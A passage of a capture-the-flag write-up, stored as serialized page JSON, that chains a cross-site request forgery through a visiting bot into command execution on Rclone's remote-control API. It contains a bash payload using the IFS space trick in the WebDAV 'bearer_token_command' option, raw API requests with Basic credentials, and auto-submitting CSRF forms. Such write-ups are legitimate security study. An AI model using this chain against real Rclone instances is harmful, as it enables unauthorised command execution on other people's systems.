])\n[...]\n}\n",[1191],{"type":32,"tag":77,"props":1192,"children":1193},{"__ignoreMap":7},[1194,1226,1233,1269,1276,1315,1348,1372,1379,1415,1441,1473,1500,1508,1529,1537,1544],{"type":32,"tag":81,"props":1195,"children":1196},{"class":83,"line":84},[1197,1202,1206,1210,1214,1218,1222],{"type":32,"tag":81,"props":1198,"children":1199},{"style":901},[1200],{"type":37,"value":1201},"const",{"type":32,"tag":81,"props":1203,"children":1204},{"style":871},[1205],{"type":37,"value":1072},{"type":32,"tag":81,"props":1207,"children":1208},{"style":94},[1209],{"type":37,"value":966},{"type":32,"tag":81,"props":1211,"children":1212},{"style":901},[1213],{"type":37,"value":904},{"type":32,"tag":81,"props":1215,"children":1216},{"style":860},[1217],{"type":37,"value":956},{"type":32,"tag":81,"props":1219,"children":1220},{"style":94},[1221],{"type":37,"value":933},{"type":32,"tag":81,"props":1223,"children":1224},{"style":94},[1225],{"type":37,"value":938},{"type":32,"tag":81,"props":1227,"children":1228},{"class":83,"line":100},[1229],
{"type":32,"tag":81,"props":1230,"children":1231},{"style":94},[1232],{"type":37,"value":854},{"type":32,"tag":81,"props":1234,"children":1235},{"class":83,"line":113},[1236,1241,1245,1250,1255,1259,1264],{"type":32,"tag":81,"props":1237,"children":1238},{"style":860},[1239],{"type":37,"value":1240},"        context",{"type":32,"tag":81,"props":1242,"children":1243},{"style":94},[1244],{"type":37,"value":966},{"type":32,"tag":81,"props":1246,"children":1247},{"style":503},[1248],{"type":37,"value":1249}," await",{"type":32,"tag":81,"props":1251,"children":1252},{"style":860},[1253],{"type":37,"value":1254}," browser",{"type":32,"tag":81,"props":1256,"children":1257},{"style":94},[1258],{"type":37,"value":868},{"type":32,"tag":81,"props":1260,"children":1261},{"style":871},[1262],{"type":37,"value":1263},"createBrowserContext",{"type":32,"tag":81,"props":1265,"children":1266},{"style":94},[1267],{"type":37,"value":1268},"()\n",{"type":32,"tag":81,"props":1270,"children":1271},{"class":83,"line":133},[1272],{"type":32,"tag":81,"props":1273,"children":1274},{"emptyLinePlaceholder":572},[1275],{"type":37,"value":575},{"type":32,"tag":81,"props":1277,"children":1278},{"class":83,"line":152},[1279,1284,1289,1293,1297,1302,1306,1311],{"type":32,"tag":81,"props":1280,"children":1281},{"style":901},[1282],{"type":37,"value":1283},"        const",{"type":32,"tag":81,"props":1285,"children":1286},{"style":860},[1287],{"type":37,"value":1288}," page1",{"type":32,"tag":81,"props":1290,"children":1291},{"style":94},[1292],{"type":37,"value":966},{"type":32,"tag":81,"props":1294,"children":1295},{"style":503},[1296],{"type":37,"value":1249},{"type":32,"tag":81,"props":1298,"children":1299},{"style":860},[1300],{"type":37,"value":1301}," 
context",{"type":32,"tag":81,"props":1303,"children":1304},{"style":94},[1305],{"type":37,"value":868},{"type":32,"tag":81,"props":1307,"children":1308},{"style":871},[1309],{"type":37,"value":1310},"newPage",{"type":32,"tag":81,"props":1312,"children":1313},{"style":94},[1314],{"type":37,"value":1268},{"type":32,"tag":81,"props":1316,"children":1317},{"class":83,"line":165},[1318,1322,1326,1330,1335,1339,1344],{"type":32,"tag":81,"props":1319,"children":1320},{"style":503},[1321],{"type":37,"value":1067},{"type":32,"tag":81,"props":1323,"children":1324},{"style":860},[1325],{"type":37,"value":1288},{"type":32,"tag":81,"props":1327,"children":1328},{"style":94},[1329],{"type":37,"value":868},{"type":32,"tag":81,"props":1331,"children":1332},{"style":871},[1333],{"type":37,"value":1334},"goto",{"type":32,"tag":81,"props":1336,"children":1337},{"style":94},[1338],{"type":37,"value":879},{"type":32,"tag":81,"props":1340,"children":1341},{"style":860},[1342],{"type":37,"value":1343},"LOGIN_URL",{"type":32,"tag":81,"props":1345,"children":1346},{"style":94},[1347],{"type":37,"value":1059},{"type":32,"tag":81,"props":1349,"children":1350},{"class":83,"line":185},[1351,1355,1359,1363,1368],{"type":32,"tag":81,"props":1352,"children":1353},{"style":503},[1354],{"type":37,"value":1067},{"type":32,"tag":81,"props":1356,"children":1357},{"style":860},[1358],{"type":37,"value":1288},{"type":32,"tag":81,"props":1360,"children":1361},{"style":94},[1362],{"type":37,"value":868},{"type":32,"tag":81,"props":1364,"children":1365},{"style":871},[1366],{"type":37,"value":1367},"close",{"type":32,"tag":81,"props":1369,"children":1370},{"style":94},[1371],{"type":37,"value":1268},{"type":32,"tag":81,"props":1373,"children":1374},{"class":83,"line":198},[1375],{"type":32,"tag":81,"props":1376,"children":1377},{"emptyLinePlaceholder":572},[1378],{"type":37,"value":575},{"type":32,"tag":81,"props":1380,"children":1381},{"class":83,"line":222},[1382,1386,1391,1395,1399,1403,1407,1411],{"type
":32,"tag":81,"props":1383,"children":1384},{"style":901},[1385],{"type":37,"value":1283},{"type":32,"tag":81,"props":1387,"children":1388},{"style":860},[1389],{"type":37,"value":1390}," page2",{"type":32,"tag":81,"props":1392,"children":1393},{"style":94},[1394],{"type":37,"value":966},{"type":32,"tag":81,"props":1396,"children":1397},{"style":503},[1398],{"type":37,"value":1249},{"type":32,"tag":81,"props":1400,"children":1401},{"style":860},[1402],{"type":37,"value":1301},{"type":32,"tag":81,"props":1404,"children":1405},{"style":94},[1406],{"type":37,"value":868},{"type":32,"tag":81,"props":1408,"children":1409},{"style":871},[1410],{"type":37,"value":1310},{"type":32,"tag":81,"props":1412,"children":1413},{"style":94},[1414],{"type":37,"value":1268},{"type":32,"tag":81,"props":1416,"children":1417},{"class":83,"line":235},[1418,1422,1427,1431,1436],{"type":32,"tag":81,"props":1419,"children":1420},{"style":503},[1421],{"type":37,"value":1067},{"type":32,"tag":81,"props":1423,"children":1424},{"style":88},[1425],{"type":37,"value":1426}," Promise",{"type":32,"tag":81,"props":1428,"children":1429},{"style":94},[1430],{"type":37,"value":868},{"type":32,"tag":81,"props":1432,"children":1433},{"style":871},[1434],{"type":37,"value":1435},"race",{"type":32,"tag":81,"props":1437,"children":1438},{"style":94},[1439],{"type":37,"value":1440},"([\n",{"type":32,"tag":81,"props":1442,"children":1443},{"class":83,"line":248},[1444,1449,1453,1457,1461,1465,1469],{"type":32,"tag":81,"props":1445,"children":1446},{"style":860},[1447],{"type":37,"value":1448},"            
page2",{"type":32,"tag":81,"props":1450,"children":1451},{"style":94},[1452],{"type":37,"value":868},{"type":32,"tag":81,"props":1454,"children":1455},{"style":871},[1456],{"type":37,"value":1334},{"type":32,"tag":81,"props":1458,"children":1459},{"style":94},[1460],{"type":37,"value":879},{"type":32,"tag":81,"props":1462,"children":1463},{"style":860},[1464],{"type":37,"value":1040},{"type":32,"tag":81,"props":1466,"children":1467},{"style":94},[1468],{"type":37,"value":898},{"type":32,"tag":81,"props":1470,"children":1471},{"style":94},[1472],{"type":37,"value":938},{"type":32,"tag":81,"props":1474,"children":1475},{"class":83,"line":261},[1476,1481,1485,1490,1495],{"type":32,"tag":81,"props":1477,"children":1478},{"style":88},[1479],{"type":37,"value":1480},"                waitUntil",{"type":32,"tag":81,"props":1482,"children":1483},{"style":94},[1484],{"type":37,"value":124},{"type":32,"tag":81,"props":1486,"children":1487},{"style":206},[1488],{"type":37,"value":1489}," '",{"type":32,"tag":81,"props":1491,"children":1492},{"style":127},[1493],{"type":37,"value":1494},"networkidle0",{"type":32,"tag":81,"props":1496,"children":1497},{"style":206},[1498],{"type":37,"value":1499},"'\n",{"type":32,"tag":81,"props":1501,"children":1502},{"class":83,"line":278},[1503],{"type":32,"tag":81,"props":1504,"children":1505},{"style":94},[1506],{"type":37,"value":1507},"            }),\n",{"type":32,"tag":81,"props":1509,"children":1510},{"class":83,"line":295},[1511,1516,1520,1525],{"type":32,"tag":81,"props":1512,"children":1513},{"style":871},[1514],{"type":37,"value":1515},"            
sleep",{"type":32,"tag":81,"props":1517,"children":1518},{"style":94},[1519],{"type":37,"value":879},{"type":32,"tag":81,"props":1521,"children":1522},{"style":146},[1523],{"type":37,"value":1524},"5000",{"type":32,"tag":81,"props":1526,"children":1527},{"style":94},[1528],{"type":37,"value":1059},{"type":32,"tag":81,"props":1530,"children":1531},{"class":83,"line":307},[1532],{"type":32,"tag":81,"props":1533,"children":1534},{"style":94},[1535],{"type":37,"value":1536},"        ])\n",{"type":32,"tag":81,"props":1538,"children":1539},{"class":83,"line":320},[1540],{"type":32,"tag":81,"props":1541,"children":1542},{"style":94},[1543],{"type":37,"value":854},{"type":32,"tag":81,"props":1545,"children":1546},{"class":83,"line":333},[1547],{"type":32,"tag":81,"props":1548,"children":1549},{"style":94},[1550],{"type":37,"value":1551},"}\n",{"type":32,"tag":46,"props":1553,"children":1554},{},[1555],{"type":37,"value":1556},"Note that the submitted URL to the bot must just comply with the HTTP standards, namely http or https + :// + domain",{"type":32,"tag":46,"props":1558,"children":1559},{},[1560],{"type":37,"value":1561},"So in one thing, our only entry point is the bot, and given the name of the challenge which suggests RCE, we potentially need to RCE on the Rclone service.",{"type":32,"tag":39,"props":1563,"children":1565},{"id":1564},"rce",[1566],{"type":37,"value":1567},"RCE ?",{"type":32,"tag":46,"props":1569,"children":1570},{},[1571,1573,1580],{"type":37,"value":1572},"To begin, we will explore the ",{"type":32,"tag":528,"props":1574,"children":1577},{"href":1575,"rel":1576},"https://github.com/rclone/rclone",[532],[1578],{"type":37,"value":1579},"source code of Rclone",{"type":37,"value":1581},", with the aim of looking for places that might allow RCE.",{"type":32,"tag":46,"props":1583,"children":1584},{},[1585],{"type":37,"value":1586},"Quickly, we come across the WebDav service which has an option that allows commands to be 
executed.",{"type":32,"tag":56,"props":1588,"children":1590},{"imgSrc":1589},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721244501/writeups/rclone/webdav_exec_command.webp",[],{"type":32,"tag":46,"props":1592,"children":1593},{},[1594,1596,1602],{"type":37,"value":1595},"However, note the use of the split function which will split our option at each space present in the command. An effective method to avoid breaking the command is to use the ",{"type":32,"tag":77,"props":1597,"children":1599},{"className":1598},[],[1600],{"type":37,"value":1601},"IFS",{"type":37,"value":1603}," bash variable which will be interpreted as a space in bash but will not be split by the go function.",{"type":32,"tag":46,"props":1605,"children":1606},{},[1607],{"type":37,"value":1608},"We can quickly test these options to see if we can execute commands on the Rclone service with a basic payload.",{"type":32,"tag":66,"props":1610,"children":1612},{"lang":1611},"bash",[1613],{"type":32,"tag":71,"props":1614,"children":1617},{"code":1615,"language":1611,"meta":7,"className":1616,"style":7},"bash -c touch${IFS}/tmp/lolipop\n","language-bash shiki shiki-themes vitesse-dark",[1618],{"type":32,"tag":77,"props":1619,"children":1620},{"__ignoreMap":7},[1621],{"type":32,"tag":81,"props":1622,"children":1623},{"class":83,"line":84},[1624,1628,1634,1639,1643,1647,1651],{"type":32,"tag":81,"props":1625,"children":1626},{"style":871},[1627],{"type":37,"value":1611},{"type":32,"tag":81,"props":1629,"children":1631},{"style":1630},"--shiki-default:#C99076",[1632],{"type":37,"value":1633}," -c",{"type":32,"tag":81,"props":1635,"children":1636},{"style":127},[1637],{"type":37,"value":1638}," 
touch",{"type":32,"tag":81,"props":1640,"children":1641},{"style":94},[1642],{"type":37,"value":1035},{"type":32,"tag":81,"props":1644,"children":1645},{"style":860},[1646],{"type":37,"value":1601},{"type":32,"tag":81,"props":1648,"children":1649},{"style":94},[1650],{"type":37,"value":1045},{"type":32,"tag":81,"props":1652,"children":1653},{"style":127},[1654],{"type":37,"value":1655},"/tmp/lolipop\n",{"type":32,"tag":46,"props":1657,"children":1658},{},[1659],{"type":37,"value":1660},"Our HTTP request to create the remote will look like this:",{"type":32,"tag":56,"props":1662,"children":1664},{"imgSrc":1663},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245298/writeups/rclone/rclone_create_webdav_command.webp",[],{"type":32,"tag":46,"props":1666,"children":1667},{},[1668],{"type":37,"value":1669},"Here is the HTTP request.\nWe can see that we have several parameters in the body of the request:",{"type":32,"tag":1671,"props":1672,"children":1673},"ul",{},[1674,1693,1698],{"type":32,"tag":1675,"props":1676,"children":1677},"li",{},[1678,1680],{"type":37,"value":1679},"Parameters:\n",{"type":32,"tag":1671,"props":1681,"children":1682},{},[1683,1688],{"type":32,"tag":1675,"props":1684,"children":1685},{},[1686],{"type":37,"value":1687},"Url: defines the url of the webdav (in our case it doesn't matter if this url doesn't work)",{"type":32,"tag":1675,"props":1689,"children":1690},{},[1691],{"type":37,"value":1692},"bearer_token_command: which will contain our bash payload that will be executed by the rclone service",{"type":32,"tag":1675,"props":1694,"children":1695},{},[1696],{"type":37,"value":1697},"Name: which will correspond to the name of the remote",{"type":32,"tag":1675,"props":1699,"children":1700},{},[1701],{"type":37,"value":1702},"Type: the type of remote we are using here is Webdav",{"type":32,"tag":71,"props":1704,"children":1706},{"code":1705},"POST /config/create HTTP/1.1\nHost: localhost:5572\nContent-Type: application/json\nAuthorization: 
Basic c2VjcmV0OnNlY3JldA==\nContent-Length: 167\n\n{\n  \"parameters\": {\n    \"url\": \"http://not_exist.localhost:9999\",\n    \"bearer_token_command\":\"bash -c touch${IFS}/tmp/lolipop\"\n  },\n  \"name\":\"test_webdav\",\n  \"type\":\"webdav\"\n}\n",[1707],{"type":32,"tag":77,"props":1708,"children":1709},{"__ignoreMap":7},[1710],{"type":37,"value":1705},{"type":32,"tag":46,"props":1712,"children":1713},{},[1714],{"type":37,"value":1715},"In order to execute our payload, it is necessary to open the recently created config and list the files present in the remote.",{"type":32,"tag":46,"props":1717,"children":1718},{},[1719],{"type":37,"value":1720},"For that we use the following request:",{"type":32,"tag":71,"props":1722,"children":1724},{"code":1723},"POST /operations/list HTTP/1.1\nHost: localhost:5572\nContent-Type: application/json\nAuthorization: Basic c2VjcmV0OnNlY3JldA==\nContent-Length: 33\n\n{\n  \"fs\":\"test_webdav:\",\n  \"remote\":\"\"\n}\n",[1725],{"type":32,"tag":77,"props":1726,"children":1727},{"__ignoreMap":7},[1728],{"type":37,"value":1723},{"type":32,"tag":56,"props":1730,"children":1732},{"imgSrc":1731},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245298/writeups/rclone/rclone_explorer.webp",[],{"type":32,"tag":46,"props":1734,"children":1735},{},[1736],{"type":37,"value":1737},"We can see that our file has been successfully created.",{"type":32,"tag":56,"props":1739,"children":1741},{"imgSrc":1740},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245280/writeups/rclone/ls_tmp.webp",[],{"type":32,"tag":46,"props":1743,"children":1744},{},[1745],{"type":37,"value":1746},"So we have an RCE on the rclone service; however, to get the flag it is necessary to go through the bot.",{"type":32,"tag":46,"props":1748,"children":1749},{},[1750],{"type":37,"value":1751},"However, it is not possible for us to send POST requests with JavaScript (e.g. with fetch) from a different domain: the credentials will not be used during the 
request and a prompt asking to authenticate will be displayed. We need to find a way to bypass this problem, such as with a CSRF, which is what we will look at in the next section.",{"type":32,"tag":39,"props":1753,"children":1755},{"id":1754},"gui-is-experimental",[1756],{"type":37,"value":1757},"GUI is experimental",{"type":32,"tag":46,"props":1759,"children":1760},{},[1761,1763,1770],{"type":37,"value":1762},"When we go to the ",{"type":32,"tag":528,"props":1764,"children":1767},{"href":1765,"rel":1766},"https://rclone.org/gui/",[532],[1768],{"type":37,"value":1769},"Rclone documentation",{"type":37,"value":1771},", we realize that the Gui option is marked as experimental.",{"type":32,"tag":56,"props":1773,"children":1775},{"imgSrc":1774},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245952/writeups/rclone/gui_experimental.webp",[],{"type":32,"tag":46,"props":1777,"children":1778},{},[1779,1781],{"type":37,"value":1780},"The documentation also gives us access to the front-end GitHub. 
",{"type":32,"tag":528,"props":1782,"children":1785},{"href":1783,"rel":1784},"https://github.com/rclone/rclone-webui-react",[532],[1786],{"type":37,"value":1787},"rclone-webui-react",{"type":32,"tag":46,"props":1789,"children":1790},{},[1791,1793,1800],{"type":37,"value":1792},"In the GitHub, we can see ",{"type":32,"tag":528,"props":1794,"children":1797},{"href":1795,"rel":1796},"https://github.com/rclone/rclone-webui-react/issues/128",[532],[1798],{"type":37,"value":1799},"an open issue",{"type":37,"value":1801}," indicating that Rclone-webui is potentially vulnerable to CSRF attacks.",{"type":32,"tag":56,"props":1803,"children":1805},{"imgSrc":1804},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245965/writeups/rclone/issue_csrf.webp",[],{"type":32,"tag":46,"props":1807,"children":1808},{},[1809],{"type":37,"value":1810},"A proof of concept is also provided, allowing us to understand that the parameters sent in the API's POST requests can also be sent in the query parameters.",{"type":32,"tag":46,"props":1812,"children":1813},{},[1814],{"type":37,"value":1815},"We therefore have the possibility from the bot to trigger a CSRF with our RCE payload that was created in the previous section. 
We can now test it with the bot in order to PoC the RCE via the bot.",{"type":32,"tag":46,"props":1817,"children":1818},{},[1819],{"type":37,"value":1820},"For this, we will create three files: two HTML files for CSRF and one index.html file that will allow us to open the two CSRF files, one to create the remote and one to trigger the RCE.",{"type":32,"tag":46,"props":1822,"children":1823},{},[1824],{"type":37,"value":1825},"We will use the same bash payload as before, but this time we will encode it in base64 to pass it as a query parameter.",{"type":32,"tag":66,"props":1827,"children":1828},{"lang":1611},[1829],{"type":32,"tag":71,"props":1830,"children":1832},{"code":1831,"language":1611,"meta":7,"className":1616,"style":7},"bash -c touch${IFS}/tmp/lolipop_from_bot\n",[1833],{"type":32,"tag":77,"props":1834,"children":1835},{"__ignoreMap":7},[1836],{"type":32,"tag":81,"props":1837,"children":1838},{"class":83,"line":84},[1839,1843,1847,1851,1855,1859,1863],{"type":32,"tag":81,"props":1840,"children":1841},{"style":871},[1842],{"type":37,"value":1611},{"type":32,"tag":81,"props":1844,"children":1845},{"style":1630},[1846],{"type":37,"value":1633},{"type":32,"tag":81,"props":1848,"children":1849},{"style":127},[1850],{"type":37,"value":1638},{"type":32,"tag":81,"props":1852,"children":1853},{"style":94},[1854],{"type":37,"value":1035},{"type":32,"tag":81,"props":1856,"children":1857},{"style":860},[1858],{"type":37,"value":1601},{"type":32,"tag":81,"props":1860,"children":1861},{"style":94},[1862],{"type":37,"value":1045},{"type":32,"tag":81,"props":1864,"children":1865},{"style":127},[1866],{"type":37,"value":1867},"/tmp/lolipop_from_bot\n",{"type":32,"tag":46,"props":1869,"children":1870},{},[1871],{"type":37,"value":1872},"Below, find the three files that allow us to execute the command:",{"type":32,"tag":46,"props":1874,"children":1875},{},[1876],{"type":37,"value":1877},"Our index.html file which will contain the redirection to our two 
csrf:",{"type":32,"tag":66,"props":1879,"children":1881},{"lang":1880},"html",[1882],{"type":32,"tag":71,"props":1883,"children":1886},{"code":1884,"language":1880,"meta":7,"className":1885,"style":7},"\u003C!-- index.html -->\n\u003Cscript>\n  window.open(\"/1.html\", \"_blank\");\n  setTimeout(() => {\n    window.open(\"/2.html\", \"_blank\");\n  }, 300);\n\u003C/script>\n","language-html shiki shiki-themes vitesse-dark",[1887],{"type":32,"tag":77,"props":1888,"children":1889},{"__ignoreMap":7},[1890,1898,1916,1972,1993,2046,2063],{"type":32,"tag":81,"props":1891,"children":1892},{"class":83,"line":84},[1893],{"type":32,"tag":81,"props":1894,"children":1895},{"style":179},[1896],{"type":37,"value":1897},"\u003C!-- index.html -->\n",{"type":32,"tag":81,"props":1899,"children":1900},{"class":83,"line":100},[1901,1906,1911],{"type":32,"tag":81,"props":1902,"children":1903},{"style":94},[1904],{"type":37,"value":1905},"\u003C",{"type":32,"tag":81,"props":1907,"children":1908},{"style":503},[1909],{"type":37,"value":1910},"script",{"type":32,"tag":81,"props":1912,"children":1913},{"style":94},[1914],{"type":37,"value":1915},">\n",{"type":32,"tag":81,"props":1917,"children":1918},{"class":83,"line":113},[1919,1924,1928,1933,1937,1942,1947,1951,1955,1959,1963,1967],{"type":32,"tag":81,"props":1920,"children":1921},{"style":860},[1922],{"type":37,"value":1923},"  
window",{"type":32,"tag":81,"props":1925,"children":1926},{"style":94},[1927],{"type":37,"value":868},{"type":32,"tag":81,"props":1929,"children":1930},{"style":871},[1931],{"type":37,"value":1932},"open",{"type":32,"tag":81,"props":1934,"children":1935},{"style":94},[1936],{"type":37,"value":879},{"type":32,"tag":81,"props":1938,"children":1939},{"style":206},[1940],{"type":37,"value":1941},"\"",{"type":32,"tag":81,"props":1943,"children":1944},{"style":127},[1945],{"type":37,"value":1946},"/1.html",{"type":32,"tag":81,"props":1948,"children":1949},{"style":206},[1950],{"type":37,"value":1941},{"type":32,"tag":81,"props":1952,"children":1953},{"style":94},[1954],{"type":37,"value":898},{"type":32,"tag":81,"props":1956,"children":1957},{"style":206},[1958],{"type":37,"value":209},{"type":32,"tag":81,"props":1960,"children":1961},{"style":127},[1962],{"type":37,"value":533},{"type":32,"tag":81,"props":1964,"children":1965},{"style":206},[1966],{"type":37,"value":1941},{"type":32,"tag":81,"props":1968,"children":1969},{"style":94},[1970],{"type":37,"value":1971},");\n",{"type":32,"tag":81,"props":1973,"children":1974},{"class":83,"line":133},[1975,1980,1985,1989],{"type":32,"tag":81,"props":1976,"children":1977},{"style":871},[1978],{"type":37,"value":1979},"  setTimeout",{"type":32,"tag":81,"props":1981,"children":1982},{"style":94},[1983],{"type":37,"value":1984},"(()",{"type":32,"tag":81,"props":1986,"children":1987},{"style":94},[1988],{"type":37,"value":933},{"type":32,"tag":81,"props":1990,"children":1991},{"style":94},[1992],{"type":37,"value":938},{"type":32,"tag":81,"props":1994,"children":1995},{"class":83,"line":152},[1996,2001,2005,2009,2013,2017,2022,2026,2030,2034,2038,2042],{"type":32,"tag":81,"props":1997,"children":1998},{"style":860},[1999],{"type":37,"value":2000},"    
window",{"type":32,"tag":81,"props":2002,"children":2003},{"style":94},[2004],{"type":37,"value":868},{"type":32,"tag":81,"props":2006,"children":2007},{"style":871},[2008],{"type":37,"value":1932},{"type":32,"tag":81,"props":2010,"children":2011},{"style":94},[2012],{"type":37,"value":879},{"type":32,"tag":81,"props":2014,"children":2015},{"style":206},[2016],{"type":37,"value":1941},{"type":32,"tag":81,"props":2018,"children":2019},{"style":127},[2020],{"type":37,"value":2021},"/2.html",{"type":32,"tag":81,"props":2023,"children":2024},{"style":206},[2025],{"type":37,"value":1941},{"type":32,"tag":81,"props":2027,"children":2028},{"style":94},[2029],{"type":37,"value":898},{"type":32,"tag":81,"props":2031,"children":2032},{"style":206},[2033],{"type":37,"value":209},{"type":32,"tag":81,"props":2035,"children":2036},{"style":127},[2037],{"type":37,"value":533},{"type":32,"tag":81,"props":2039,"children":2040},{"style":206},[2041],{"type":37,"value":1941},{"type":32,"tag":81,"props":2043,"children":2044},{"style":94},[2045],{"type":37,"value":1971},{"type":32,"tag":81,"props":2047,"children":2048},{"class":83,"line":165},[2049,2054,2059],{"type":32,"tag":81,"props":2050,"children":2051},{"style":94},[2052],{"type":37,"value":2053},"  },",{"type":32,"tag":81,"props":2055,"children":2056},{"style":146},[2057],{"type":37,"value":2058}," 300",{"type":32,"tag":81,"props":2060,"children":2061},{"style":94},[2062],{"type":37,"value":1971},{"type":32,"tag":81,"props":2064,"children":2065},{"class":83,"line":185},[2066,2071,2075],{"type":32,"tag":81,"props":2067,"children":2068},{"style":94},[2069],{"type":37,"value":2070},"\u003C/",{"type":32,"tag":81,"props":2072,"children":2073},{"style":503},[2074],{"type":37,"value":1910},{"type":32,"tag":81,"props":2076,"children":2077},{"style":94},[2078],{"type":37,"value":1915},{"type":32,"tag":46,"props":2080,"children":2081},{},[2082],{"type":37,"value":2083},"First CSRF allowing us to create our \"remote\" of type webdav. 
We will find the parameters we described earlier in the body in this case we need to encode it and pass it as a query parameter.",{"type":32,"tag":66,"props":2085,"children":2086},{"lang":1880},[2087],{"type":32,"tag":71,"props":2088,"children":2090},{"code":2089,"language":1880,"meta":7,"className":1885,"style":7},"\u003C!-- 1.html -->\n \u003Cform method=\"POST\" action='http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+touch${IFS}/tmp/lolipop_from_bot\"}&name=test_csrf&type=webdav'>\n  \u003Cinput type=\"submit\" value=\"CSRF\" />\n  \u003Cscript>\n    document.forms[0].submit();\n  \u003C/script>\n\u003C/form>\n",[2091],{"type":32,"tag":77,"props":2092,"children":2093},{"__ignoreMap":7},[2094,2102,2164,2226,2241,2282,2298],{"type":32,"tag":81,"props":2095,"children":2096},{"class":83,"line":84},[2097],{"type":32,"tag":81,"props":2098,"children":2099},{"style":179},[2100],{"type":37,"value":2101},"\u003C!-- 1.html -->\n",{"type":32,"tag":81,"props":2103,"children":2104},{"class":83,"line":100},[2105,2110,2115,2120,2125,2129,2134,2138,2143,2147,2151,2156,2160],{"type":32,"tag":81,"props":2106,"children":2107},{"style":94},[2108],{"type":37,"value":2109}," \u003C",{"type":32,"tag":81,"props":2111,"children":2112},{"style":503},[2113],{"type":37,"value":2114},"form",{"type":32,"tag":81,"props":2116,"children":2117},{"style":860},[2118],{"type":37,"value":2119}," method",{"type":32,"tag":81,"props":2121,"children":2122},{"style":94},[2123],{"type":37,"value":2124},"=",{"type":32,"tag":81,"props":2126,"children":2127},{"style":206},[2128],{"type":37,"value":1941},{"type":32,"tag":81,"props":2130,"children":2131},{"style":127},[2132],{"type":37,"value":2133},"POST",{"type":32,"tag":81,"props":2135,"children":2136},{"style":206},[2137],{"type":37,"value":1941},{"type":32,"tag":81,"props":2139,"children":2140},{"style":860},[2141],{"type":37,"value":2142}," 
action",{"type":32,"tag":81,"props":2144,"children":2145},{"style":94},[2146],{"type":37,"value":2124},{"type":32,"tag":81,"props":2148,"children":2149},{"style":206},[2150],{"type":37,"value":884},{"type":32,"tag":81,"props":2152,"children":2153},{"style":127},[2154],{"type":37,"value":2155},"http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+touch${IFS}/tmp/lolipop_from_bot\"}&name=test_csrf&type=webdav",{"type":32,"tag":81,"props":2157,"children":2158},{"style":206},[2159],{"type":37,"value":884},{"type":32,"tag":81,"props":2161,"children":2162},{"style":94},[2163],{"type":37,"value":1915},{"type":32,"tag":81,"props":2165,"children":2166},{"class":83,"line":113},[2167,2172,2177,2182,2186,2190,2195,2199,2204,2208,2212,2217,2221],{"type":32,"tag":81,"props":2168,"children":2169},{"style":94},[2170],{"type":37,"value":2171},"  \u003C",{"type":32,"tag":81,"props":2173,"children":2174},{"style":503},[2175],{"type":37,"value":2176},"input",{"type":32,"tag":81,"props":2178,"children":2179},{"style":860},[2180],{"type":37,"value":2181}," type",{"type":32,"tag":81,"props":2183,"children":2184},{"style":94},[2185],{"type":37,"value":2124},{"type":32,"tag":81,"props":2187,"children":2188},{"style":206},[2189],{"type":37,"value":1941},{"type":32,"tag":81,"props":2191,"children":2192},{"style":127},[2193],{"type":37,"value":2194},"submit",{"type":32,"tag":81,"props":2196,"children":2197},{"style":206},[2198],{"type":37,"value":1941},{"type":32,"tag":81,"props":2200,"children":2201},{"style":860},[2202],{"type":37,"value":2203}," 
value",{"type":32,"tag":81,"props":2205,"children":2206},{"style":94},[2207],{"type":37,"value":2124},{"type":32,"tag":81,"props":2209,"children":2210},{"style":206},[2211],{"type":37,"value":1941},{"type":32,"tag":81,"props":2213,"children":2214},{"style":127},[2215],{"type":37,"value":2216},"CSRF",{"type":32,"tag":81,"props":2218,"children":2219},{"style":206},[2220],{"type":37,"value":1941},{"type":32,"tag":81,"props":2222,"children":2223},{"style":94},[2224],{"type":37,"value":2225}," />\n",{"type":32,"tag":81,"props":2227,"children":2228},{"class":83,"line":133},[2229,2233,2237],{"type":32,"tag":81,"props":2230,"children":2231},{"style":94},[2232],{"type":37,"value":2171},{"type":32,"tag":81,"props":2234,"children":2235},{"style":503},[2236],{"type":37,"value":1910},{"type":32,"tag":81,"props":2238,"children":2239},{"style":94},[2240],{"type":37,"value":1915},{"type":32,"tag":81,"props":2242,"children":2243},{"class":83,"line":152},[2244,2249,2253,2258,2263,2268,2273,2277],{"type":32,"tag":81,"props":2245,"children":2246},{"style":860},[2247],{"type":37,"value":2248},"    document",{"type":32,"tag":81,"props":2250,"children":2251},{"style":94},[2252],{"type":37,"value":868},{"type":32,"tag":81,"props":2254,"children":2255},{"style":860},[2256],{"type":37,"value":2257},"forms",{"type":32,"tag":81,"props":2259,"children":2260},{"style":94},[2261],{"type":37,"value":2262},"[",{"type":32,"tag":81,"props":2264,"children":2265},{"style":146},[2266],{"type":37,"value":2267},"0",{"type":32,"tag":81,"props":2269,"children":2270},{"style":94},[2271],{"type":37,"value":2272},"].",{"type":32,"tag":81,"props":2274,"children":2275},{"style":871},[2276],{"type":37,"value":2194},{"type":32,"tag":81,"props":2278,"children":2279},{"style":94},[2280],{"type":37,"value":2281},"();\n",{"type":32,"tag":81,"props":2283,"children":2284},{"class":83,"line":165},[2285,2290,2294],{"type":32,"tag":81,"props":2286,"children":2287},{"style":94},[2288],{"type":37,"value":2289},"  
\u003C/",{"type":32,"tag":81,"props":2291,"children":2292},{"style":503},[2293],{"type":37,"value":1910},{"type":32,"tag":81,"props":2295,"children":2296},{"style":94},[2297],{"type":37,"value":1915},{"type":32,"tag":81,"props":2299,"children":2300},{"class":83,"line":185},[2301,2305,2309],{"type":32,"tag":81,"props":2302,"children":2303},{"style":94},[2304],{"type":37,"value":2070},{"type":32,"tag":81,"props":2306,"children":2307},{"style":503},[2308],{"type":37,"value":2114},{"type":32,"tag":81,"props":2310,"children":2311},{"style":94},[2312],{"type":37,"value":1915},{"type":32,"tag":46,"props":2314,"children":2315},{},[2316,2318,2324],{"type":37,"value":2317},"The second CSRF allows listing the files present in ",{"type":32,"tag":77,"props":2319,"children":2321},{"className":2320},[],[2322],{"type":37,"value":2323},"remote",{"type":37,"value":2325},", this action will then trigger our command passed as a parameter in the previous 